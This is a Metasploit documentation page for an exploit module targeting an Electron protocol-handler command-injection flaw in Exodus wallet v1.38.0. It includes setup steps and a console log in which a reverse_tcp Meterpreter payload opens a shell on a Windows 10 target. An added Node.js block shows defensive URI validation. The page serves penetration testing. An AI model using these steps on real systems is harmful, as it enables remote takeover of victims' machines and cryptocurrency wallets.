
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/exploit/windows/browser/exodus.md

## Description

This module exploits an Electron remote code execution vulnerability in the Exodus wallet. Because of a flaw in the way Electron registers its protocol handler, command line arguments can be injected into the application through a crafted URI passed to that handler. This module has been tested successfully on Windows 10 Enterprise x64. The vulnerable application, Exodus v1.38.0, is available for download.
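As an added illustration (not code from the Metasploit module or from Exodus), the following Node.js check shows the receiving-side validation a custom protocol handler needs against the bug class described above: it refuses URIs carrying quoting or whitespace that could smuggle extra command-line switches into the process, and accepts only a single scheme-matching argument from `argv`. The scheme name `exodus` and the function names are assumptions.

```javascript
// Added example: defensive validation of a URI handed to a custom protocol
// handler, so that its content cannot turn into extra command-line switches.
// Scheme name is an assumption; adapt it to the application being protected.
const EXPECTED_SCHEME = "exodus";

// Quotes and whitespace are what let a value break out of the "%1" quoting
// of a Windows protocol-handler command template and start a new argument.
const FORBIDDEN = /[\s"'`]/;

function isSafeProtocolUri(raw) {
  if (typeof raw !== "string" || raw.length === 0 || raw.length > 2048) {
    return false;
  }
  let url;
  try {
    url = new URL(raw);
  } catch {
    return false; // not even parseable as a URL
  }
  if (url.protocol !== `${EXPECTED_SCHEME}:`) return false;

  // Check both the raw string and its percent-decoded form (defense in depth:
  // some launch paths decode before the value reaches the command line).
  let decoded;
  try {
    decoded = decodeURIComponent(raw);
  } catch {
    return false; // malformed percent-encoding
  }
  return !FORBIDDEN.test(raw) && !FORBIDDEN.test(decoded);
}

// Accept exactly one scheme-matching argument and no switch-looking entries;
// anything else is treated as a tampered launch and rejected.
function extractProtocolUri(argv) {
  const uris = argv.filter((a) => a.startsWith(`${EXPECTED_SCHEME}:`));
  const switches = argv.filter((a) => a.startsWith("-"));
  if (uris.length !== 1 || switches.length > 0) return null;
  return isSafeProtocolUri(uris[0]) ? uris[0] : null;
}

module.exports = { isSafeProtocolUri, extractProtocolUri };
```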

## Verification Steps

1. Install Exodus Wallet version v1.38.0
2. Start msfconsole
3. Do: `use exploit/windows/browser/exodus`
4. Do: `set PAYLOAD windows/meterpreter/reverse_tcp`
5. Do: `set LHOST <ip>`
6. Do: `exploit`
7. On the target machine, browse to the malicious URL and launch Exodus
8. Verify the Meterpreter session is opened

## Scenarios

### Exodus Wallet v1.38.0 on Windows 10 Enterprise x64

```
msf > use exploit/windows/browser/exodus
msf exploit(windows/browser/exodus) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(windows/browser/exodus) > set LHOST 172.16.40.5
LHOST => 172.16.40.5
msf exploit(windows/browser/exodus) > exploit
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 172.16.40.5:4444
[*] Using URL: http://0.0.0.0:80/
msf exploit(windows/browser/exodus) > [*] Local IP: http://172.16.40.5:80/
[*] Server started.
[*] 172.16.40.149    exodus - Delivering Payload
[*] Sending stage (179779 bytes) to 172.16.40.149
[*] Meterpreter session 1 opened (172.16.40.5:4444 -> 172.16.40.149:49726) at 2018-02-23 15:40:17 +0000

msf exploit(windows/browser/exodus) > sessions 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : DESKTOP-PI8214R
OS              : Windows 10 (Build 10586).
Architecture    : x64
System Language : pt_PT
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter >
```